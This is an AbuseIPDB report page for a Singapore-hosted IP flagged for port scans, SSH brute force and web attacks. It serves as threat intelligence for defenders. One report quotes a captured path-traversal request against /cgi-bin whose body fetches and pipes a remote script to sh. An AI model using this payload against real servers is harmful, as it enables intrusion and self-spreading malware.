JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 185.227.134.59

185.227.134.59 was found in our database!

This IP was reported 166 times. Confidence of Abuse is 0%: ?

ISP	Contabo GmbH
Usage Type	Data Center/Web Hosting/Transit
ASN	AS141995
Hostname(s)	vmi3231325.contaboserver.net
Domain Name	contabo.com
Country	🇸🇬 Singapore
City	Singapore

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 185.227.134.59

Whois 185.227.134.59

IP Abuse Reports for 185.227.134.59:

This IP address has been reported a total of 166 times from 96 distinct sources. 185.227.134.59 was first reported on February 26th 2026, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇨🇳 ThreatBook.io	2026-04-14 23:15:18 (1 month ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/185.227.134.59 2026 ... show more ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/185.227.134.59 2026-04-14 17:54:58 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget --no-check-certificate -qO- https://178.16.55.224/sh \|\| curl -sk https://178.16.55.224/sh) \| sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["/"],"Connection":["keep-alive"],"Content-Length":["119"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"]},"host":"106.75.75.181:443","method":"POST","proto":"HTTP/1.1","remote_addr":"185.227.134.59:58824","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"} show less	Web App Attack
🇹🇷 rtbh.com.tr	2026-02-28 20:11:48 (3 months ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇦🇹 urnilxfgbez	2026-02-27 23:45:00 (3 months ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇨🇳 ThreatBook.io	2026-02-27 23:26:38 (3 months ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/185.227.134.59	Brute-Force
🇹🇷 rtbh.com.tr	2026-02-27 20:11:47 (3 months ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇩🇪 phil2k	2026-02-27 15:01:02 (3 months ago)	portscan on multiple TCP ports : Firewall: Within 2026-02-26 09:19:33 - 2026-02-26 09:19:34 CET(+010 ... show more portscan on multiple TCP ports : Firewall: Within 2026-02-26 09:19:33 - 2026-02-26 09:19:34 CET(+0100) identified: unallowed access from 185.227.134.59/32 on port 2222(tcp:2222) (1 trial) Fail2ban: Within 2026-02-26 09:19:33 - 2026-02-26 09:19:34 CET(+0100) banned: 5 times by fail2ban[firewall]; 5 times by fail2ban[recidive] show less	Port Scan
🇫🇮 tjs	2026-02-27 12:35:00 (3 months ago)	web attack, shell attempt	Hacking Web App Attack
🇮🇳 Mr.Singh	2026-02-27 03:30:30 (3 months ago)	NFT blocked 185.227.134.59 after 3 rejections on 27-Feb-2026.	Port Scan Brute-Force
🇬🇧 andypiper	2026-02-27 02:02:29 (3 months ago)	CrowdSec ban for AbuseIPDB Top List	Brute-Force Web App Attack
🇺🇸 Tect.host	2026-02-27 02:00:11 (3 months ago)	Brute-force SSH server detected by Fail2ban	Brute-Force SSH
🇩🇪 BlueWire Hosting	2026-02-27 01:53:11 (3 months ago)	Bad bot ignoring robot.txt	Bad Web Bot
Anonymous	2026-02-27 01:50:41 (3 months ago)	fail2ban_an apache-modsecurity [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [uri "/hello ... show more fail2ban_an apache-modsecurity [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [uri "/hello.world"] show less	Bad Web Bot Web App Attack
🇺🇸 bigscoots.com	2026-02-27 01:45:01 (3 months ago)	(sshd) Failed SSH login from 185.227.134.59 (SG/Singapore/vmi3106816.contaboserver.net): 5 in the la ... show more (sshd) Failed SSH login from 185.227.134.59 (SG/Singapore/vmi3106816.contaboserver.net): 5 in the last 3600 secs; Ports: *; Direction: 1; Trigger: LF_SSHD; Logs: Feb 26 19:43:33 13312 sshd[20522]: Invalid user admin from 185.227.134.59 port 56996 Feb 26 19:43:35 13312 sshd[20522]: Failed password for invalid user admin from 185.227.134.59 port 56996 ssh2 Feb 26 19:44:06 13312 sshd[20582]: Invalid user orangepi from 185.227.134.59 port 49824 Feb 26 19:44:08 13312 sshd[20582]: Failed password for invalid user orangepi from 185.227.134.59 port 49824 ssh2 Feb 26 19:44:40 13312 sshd[20595]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.227.134.59 user=root show less	Brute-Force SSH
🇩🇪 iNetWorker	2026-02-27 01:31:50 (3 months ago)	firewall-block, port(s): 443/tcp	Port Scan
🇺🇸 bigscoots.com	2026-02-27 01:08:05 (3 months ago)	(sshd) Failed SSH login from 185.227.134.59 (SG/Singapore/vmi3106816.contaboserver.net): 5 in the la ... show more (sshd) Failed SSH login from 185.227.134.59 (SG/Singapore/vmi3106816.contaboserver.net): 5 in the last 3600 secs; Ports: *; Direction: 1; Trigger: LF_SSHD; Logs: Feb 26 19:06:53 14601 sshd[29566]: Invalid user admin from 185.227.134.59 port 54052 Feb 26 19:06:55 14601 sshd[29566]: Failed password for invalid user admin from 185.227.134.59 port 54052 ssh2 Feb 26 19:07:27 14601 sshd[29719]: Invalid user orangepi from 185.227.134.59 port 43954 Feb 26 19:07:30 14601 sshd[29719]: Failed password for invalid user orangepi from 185.227.134.59 port 43954 ssh2 Feb 26 19:08:01 14601 sshd[29760]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.227.134.59 user=root show less	Brute-Force SSH

Showing 1 to 15 of 166 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇯🇵 206.237.127.69

🇩🇪 217.160.68.87

🇺🇸 162.216.150.130

🇺🇸 147.185.132.93

🇺🇸 147.185.132.90

🇫🇷 144.91.111.89

🇨🇳 139.226.161.206

🇺🇸 137.184.36.28

🇨🇳 116.179.37.208

🇨🇳 116.179.37.180

🇺🇸 97.91.169.248

🇧🇬 91.92.40.171

🇺🇸 71.195.171.226

🇨🇳 58.34.152.146

🇺🇸 20.168.124.0

🇺🇸 20.65.195.105

🇺🇸 205.210.31.104

🇺🇸 193.202.11.59

🇳🇱 185.226.197.67

🇺🇸 162.216.150.211